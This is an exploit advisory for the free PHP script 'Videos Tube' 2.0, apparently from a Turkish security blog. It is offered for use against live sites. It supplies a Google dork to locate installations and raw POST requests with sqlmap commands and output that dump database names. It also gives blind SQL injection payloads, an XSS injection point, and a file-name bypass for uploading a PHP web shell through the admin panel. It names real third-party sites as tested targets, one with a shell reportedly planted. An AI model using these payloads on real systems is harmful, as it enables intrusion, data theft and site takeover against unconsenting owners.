~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Videos Tube
|~Price : FREE
|~Version : 2.0, updated the lastest version.
|~Software: http://www.phpscriptlerim.com/ucretsiz/videos-tube.html
|~Multiple Vulnerabilities: SQL Injection & Cross Site Scripting & Shell Upload
|~Google DORK : "© 2014, Videos Tube. Tüm Hakları Saklıdır."
|[~]Date : "15 KAS. 2014"
|[~]Tested on : Kali Linux
Tested on Demos;
http://demo.phpscriptlerim.com/free/videostube/
http://www.tıger61.com/
http://www.birkovabuziddiasi.com/
http://video.egitimledirilis.com/
====================== SQL Injection Vulnerability (POST Method) ===============
Example; http://demo.phpscriptlerim.com/free/videostube/
Target: http://demo.phpscriptlerim.com/free/videostube/search.php
POST :/ search=[SQL Injection]&ara=
-------------------------------------------------------------
POST /free/videostube/search.php HTTP/1.1
Host: demo.phpscriptlerim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
search=[Post Method SQL Injection]&ara=
..
..
##############Exploitation sqlmap console.##########
sqlmap -u "http://demo.phpscriptlerim.com/free/videostube/search.php" --data"=search=&ara=" -p "search" --dbs
####################################################
---
Place: POST
Parameter: search
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: search=-6400' OR (6785=6785)#&ara=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: search=' AND SLEEP(5)#&ara=
---
[01:16:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.34
back-end DBMS: MySQL 5.0.11
[01:16:58] [INFO] fetching database names
[01:16:58] [INFO] fetching number of databases
[01:16:58] [WARNING] reflective value(s) found and filtering out
[01:16:58] [INFO] resumed: 2
[01:16:58] [INFO] resumed: information_schema
[01:16:58] [INFO] resumed: phpscrip_videostube
available databases [2]:
[*] information_schema
[*] phpscrip_videostube
==============================================================================
==============================================================================
==================Cross Site Scripting Vulnerability =========================
Target: http://demo.phpscriptlerim.com/free/videostube/search.php
POST to :/ search=[XSS]&ara=
-------------------------------------------------------------
POST /free/videostube/search.php HTTP/1.1
Host: demo.phpscriptlerim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
search=[XSS]&ara=
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==============================================================================
==============================================================================
==========Admin Panel - Shell Upload Vulnerability (bypass with Tamper data) =======
INFO;
performed primarily access the admin panel ; http://www.TARGET.com/yonetim/
then go..
http://www.VICTIM.com/upload/upload.php
for bypass shell file name "name.php;.jpeg"
and then using tamper data file can be loaded shell was tested!
TESTED ON : http://www.birkovabuziddiasi.com/upload/resimler/70ed4c94a1.php
=============================================================
Vulnerability Researching, Shellcode, PoC, Exploits, Zeroday, h4 SEC
Hiç yorum yok:
Yorum Gönder